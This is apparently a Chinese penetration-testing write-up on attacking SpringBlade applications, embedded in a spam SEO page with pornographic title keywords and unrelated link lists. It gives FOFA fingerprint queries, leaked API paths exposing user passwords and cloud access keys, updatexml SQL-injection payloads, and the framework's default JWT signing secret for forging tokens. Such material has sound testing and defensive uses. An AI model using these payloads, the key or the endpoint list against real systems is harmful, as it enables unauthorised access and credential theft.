中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

重慶網(wǎng)站優(yōu)化服務(wù)優(yōu)化關(guān)鍵詞排名提升

重慶網(wǎng)站優(yōu)化服務(wù),優(yōu)化關(guān)鍵詞排名提升,南寧網(wǎng)站建設(shè)公,建網(wǎng)站的服務(wù)器Springblade框架介紹: SpringBlade是一個(gè)基于Spring Boot和Spring Cloud的微服務(wù)架構(gòu)框架,它是由商業(yè)級(jí)項(xiàng)目升級(jí)優(yōu)化而來(lái)的綜合型項(xiàng)目。 0x1 前言 最近跟一些大佬學(xué)習(xí)了blade的漏洞,所以自己總結(jié)了一下,在滲透測(cè)試過(guò)程中&#x…

?Springblade框架介紹:

SpringBlade是一個(gè)基于Spring Boot和Spring Cloud的微服務(wù)架構(gòu)框架,它是由商業(yè)級(jí)項(xiàng)目升級(jí)優(yōu)化而來(lái)的綜合型項(xiàng)目。

圖片

0x1 前言

最近跟一些大佬學(xué)習(xí)了blade的漏洞,所以自己總結(jié)了一下,在滲透測(cè)試過(guò)程中,遇到blade框架的時(shí)候,該有哪些滲透思路,Springblade是基于spring-boot開(kāi)發(fā)的,接口泄露、sql注入他也存在。

0x2 Spring-blade特征

特征1

看到一把劍沒(méi)有,這就是它的特征,可以將一個(gè)ico圖片,下載下來(lái),在fofa、鷹圖上搜索,很多資產(chǎn)都是blade的

icon_hash="1047841028"

圖片

特征2

在頁(yè)面加載過(guò)程中,會(huì)出現(xiàn)以下的加載頁(yè)面,和最下方的https://bladex.vip,此時(shí)我們就可以將這個(gè)地址放到fofa上去擴(kuò)大資產(chǎn)

圖片

body="https://bladex.vip"

圖片

特征3

在路徑中若發(fā)現(xiàn)blade,這個(gè)字段,也基本可以確定是blade框架

/api/blade-user/info/api/blade-auth/oauth/captcha.....

0x3 發(fā)現(xiàn)資產(chǎn)

額,本來(lái)是像找一個(gè)可以注冊(cè)的站,然后通過(guò)注冊(cè)進(jìn)去,想不到隨便翻翻。。。。

直接把賬號(hào)密碼,寫(xiě)在頁(yè)面中。。。。

圖片

圖片

進(jìn)來(lái)之后,抓取數(shù)據(jù)包,說(shuō)明一嘴,在路徑中若看到blade-system,這個(gè)路徑也代表這個(gè)站就是blade框架

圖片

0x4 漏洞案列

4.1 接口泄露

正常情況下,應(yīng)該是/api/blade-system/,但很明顯開(kāi)發(fā)人員將前面的路徑改了,這樣有些人在使用掃描器批量掃資產(chǎn)的時(shí)候,就會(huì)錯(cuò)過(guò)這樣的站點(diǎn)

/oaApi/blade-system/menu/buttons

圖片

/oaApi/blade-system/user/user-list

泄露了大量用戶(hù)的姓名,密碼(也包括管理員的信息)

圖片

/oaApi/blade-resource/oss/list

泄露云服務(wù)器的accesskey、secrekey,直接去接管

圖片

這里我們使用OSS Browser工具,使用cname進(jìn)行連接,否者連接不上,登錄成功,但里面不存在任何的數(shù)據(jù)。

下載地址:https://github.com/aliyun/oss-browser

圖片

圖片

這里還有很多的泄露信息的接口,就不一一列舉了,我將自己收集的bladeapi接口,放到附件里面了,需要的師傅請(qǐng)到社區(qū)自取:https://bbs.zkaq.cn/t/31811.html。

/api/blade-system/user/user-list/api/blade-system/tenant/select/api/blade-develop/datasource/list/api/blade-resource/oss/list/api/blade-develop/datasource/list/api/blade-system/code/remove/api/blade-resource/oss/remove/api/blade-system/dict-biz/remove/authority/role/add/system/dict/add.......

4.2 SQL注入

/oaApi/blade-log/error/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1

e這個(gè)不存在這個(gè)漏洞

圖片

試了其他注入點(diǎn),也不存在注入

/oaApi/blade-user/export-user?Blade-Auth=[jwt碼]&account=&realName=&1-updatexml(1,concat(0x5c,database(),0x5c),1)=1

圖片

4.3 jwt硬編碼

bladexisapowerfulmicroservicearchitectureupgradedandoptimizedfromacommercialproject

漏洞原因:開(kāi)發(fā)者在使用jwt進(jìn)行身份認(rèn)證時(shí),并沒(méi)有對(duì)默認(rèn)的jwt密鑰進(jìn)行修改,導(dǎo)致黑客可以利用默認(rèn)的jwt密鑰去偽造jwt值,可以欺騙服務(wù)器獲取用戶(hù)權(quán)限等

教程:將上面的密鑰放到箭頭指示的位置,然后修改payload里的字段,因?yàn)榉?wù)器都是通過(guò)這個(gè)payload中的字段進(jìn)行鑒權(quán)的,所以通過(guò)修改payload中的字段,來(lái)達(dá)到偽造jwt欺騙服務(wù)器

圖片

將修改后的jwt字段,放回Blade-Auth中,放包,看是否回顯,若回顯,則證明存在jwt硬編碼。

圖片

不成功則會(huì)出現(xiàn)未授權(quán)

圖片

0x5 總結(jié)

結(jié)束,以上是我了解的blade框架的漏洞,暫時(shí)就知道這些漏洞,若后續(xù)有新發(fā)現(xiàn)的漏洞也會(huì)補(bǔ)上,謝謝師傅們觀(guān)看

http://www.risenshineclean.com/news/7915.html

相關(guān)文章:

  • 永久免費(fèi)erp長(zhǎng)沙百度網(wǎng)站排名優(yōu)化
  • 網(wǎng)站建設(shè)寬帶seo優(yōu)化排名百度教程
  • 北京市順義區(qū)住房和建設(shè)委員會(huì)網(wǎng)站自助建站免費(fèi)建站平臺(tái)
  • 毛片a做片在線(xiàn)觀(guān)看網(wǎng)站有哪些鄭州seo優(yōu)化公司
  • 河南省建設(shè)工程一體化平臺(tái)常州seo招聘
  • wordpress+魅族天津債務(wù)優(yōu)化公司
  • 淘客怎么做推廣網(wǎng)站電商運(yùn)營(yíng)是做什么的
  • 完整的活動(dòng)策劃方案seo外鏈推廣工具下載
  • 做網(wǎng)站多久能盈利營(yíng)銷(xiāo)咨詢(xún)顧問(wèn)
  • 好網(wǎng)站目錄汽車(chē)軟文廣告
  • php做購(gòu)物網(wǎng)站武漢seo首頁(yè)優(yōu)化報(bào)價(jià)
  • 做英文企業(yè)網(wǎng)站濟(jì)南網(wǎng)站seo公司
  • 求生之路2怎么做非官方網(wǎng)站東莞做網(wǎng)站公司
  • 分類(lèi)網(wǎng)站怎么做seo百度ocpc如何優(yōu)化
  • 專(zhuān)門(mén)做淘寶優(yōu)惠券的網(wǎng)站醫(yī)院線(xiàn)上預(yù)約
  • 廈門(mén)市網(wǎng)站建設(shè)公司廈門(mén)百度推廣開(kāi)戶(hù)
  • 北京微信公眾號(hào)仁茂網(wǎng)絡(luò)seo
  • 營(yíng)銷(xiāo)型網(wǎng)站策劃設(shè)計(jì)銀川seo優(yōu)化
  • 做網(wǎng)站首頁(yè)站長(zhǎng)工具使用方法
  • 自學(xué)免費(fèi)網(wǎng)站建設(shè)google開(kāi)戶(hù)
  • 寶安區(qū)建設(shè)交易網(wǎng)站內(nèi)部?jī)?yōu)化
  • 回收那個(gè)網(wǎng)站做推廣好網(wǎng)站快速刷排名工具
  • 網(wǎng)站開(kāi)發(fā)規(guī)劃書(shū)龍巖網(wǎng)站推廣
  • java .net做網(wǎng)站能打開(kāi)任何網(wǎng)站瀏覽器
  • 紅酒營(yíng)銷(xiāo)型網(wǎng)站建設(shè)seo創(chuàng)業(yè)
  • 阿里云速美建站2345導(dǎo)航網(wǎng)址
  • 單純做seo能否提升網(wǎng)站流量如何免費(fèi)開(kāi)自己的網(wǎng)站
  • 建筑網(wǎng)站設(shè)置工資單人換了怎么換寧波正規(guī)seo推廣
  • 營(yíng)銷(xiāo)型平臺(tái)網(wǎng)站建設(shè)培訓(xùn)方案
  • 門(mén)戶(hù)網(wǎng)站如何推廣互聯(lián)網(wǎng)推廣是干什么的